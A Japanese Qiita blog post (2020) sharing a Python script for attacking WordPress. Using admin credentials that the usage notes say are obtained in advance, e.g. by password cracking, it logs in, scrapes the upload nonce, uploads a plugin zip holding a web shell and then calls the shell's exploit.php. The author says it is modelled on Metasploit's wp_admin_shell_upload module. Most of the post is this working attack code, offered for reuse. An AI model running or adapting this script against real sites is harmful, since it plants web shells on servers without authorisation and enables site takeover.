1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

WordPressのプラグインをアップロードするスクリプトを書いてみた

Last updated at Posted at 2020-03-07

1.目的

WordPressを攻略するときに、WebShellをアップロードするお手軽なスクリプトが欲しかったが、Webに見つからなかったのでMetasploitのwp_admin_shell_uploadモジュールの通信を参考にして書いてみた。

2.コード

wp_plugin_upload.py
#!/usr/bin/python
# coding: utf-8

import requests
import sys
import bs4

url = 'http://10.11.XX.XX'
loginUri = '/wp/wp-login.php'
adminUri = '/wp/wp-admin/'
pluginUri = '/wp/wp-admin/plugin-install.php?tab=upload'
uploadUri = '/wp/wp-admin/update.php?action=upload-plugin'
uploadFile = {'pluginzip': ('exploit_plugin.zip', open('exploit_plugin.zip', 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})}
exploitUri = '/wp/wp-content/plugins/exploit_plugin/exploit.php'

# Headers
headers = {'wordpress_test_cookie':'WP+Cookie+check', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'}

try:
    # Session
    s = requests.Session()

    # Login
    loginData =  {'log':'admin', 'pwd':'XXXX', 'redirect_to':url + adminUri, 'wp-submit':'Login', 'rememberme':'forever', 'testcookie':'1'}
    r = s.post(url + loginUri, data=loginData)
    r.raise_for_status()

    # Plugin Install Page
    r = s.get(url + pluginUri, headers=headers)
    r.raise_for_status()

    # Get Hidden Param _wpnonce 
    # <input id="_wpnonce" name="_wpnonce" type="hidden" value="fdccb03ee7"/>
    # <input name="_wp_http_referer" type="hidden" value="/wp/wp-admin/plugin-install.php?tab=upload"/>
    # <input id="pluginzip" name="pluginzip" type="file"/>
    # <input class="button" id="install-plugin-submit" name="install-plugin-submit" type="submit" value="Install Now"/>
    bs4obj = bs4.BeautifulSoup(r.content, 'html5lib')
    wpnonce = bs4obj.find('input',id='_wpnonce')
    # print wpnonce['value']

    # Zip Upload
    multiPartData = {'_wpnonce':wpnonce['value'], 
                 'wp_http_referer':'/wp/wp-admin/plugin-install.php?tab=upload',
                 'install-plugin-submit':'Install Now'}

    r = s.post(url + uploadUri, files=uploadFile, data=multiPartData, headers=headers)
    r.raise_for_status()

    # Exploit Run
    r = s.get(url + exploitUri)
    r.raise_for_status()

except requests.exceptions.RequestException as e:
    print(e)
    sys.exit(1)

print(r.status_code)
# print(r.text)

3.使い方

スクリプトと同じフォルダに圧縮したZIPファイル(exploit_plugin.zip)を置いておくとWordPresspのpluginsフォルダにアップロードしてくれます。また、実行にはパスクラックなどでWordPressのアカウントを取得しておく必要があり、IPアドレスなどは環境に応じて書き換えます。

$ python wp_plugin_upload.py

※正直、しょぼいスクリプトなので参考程度にしてください。

1
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?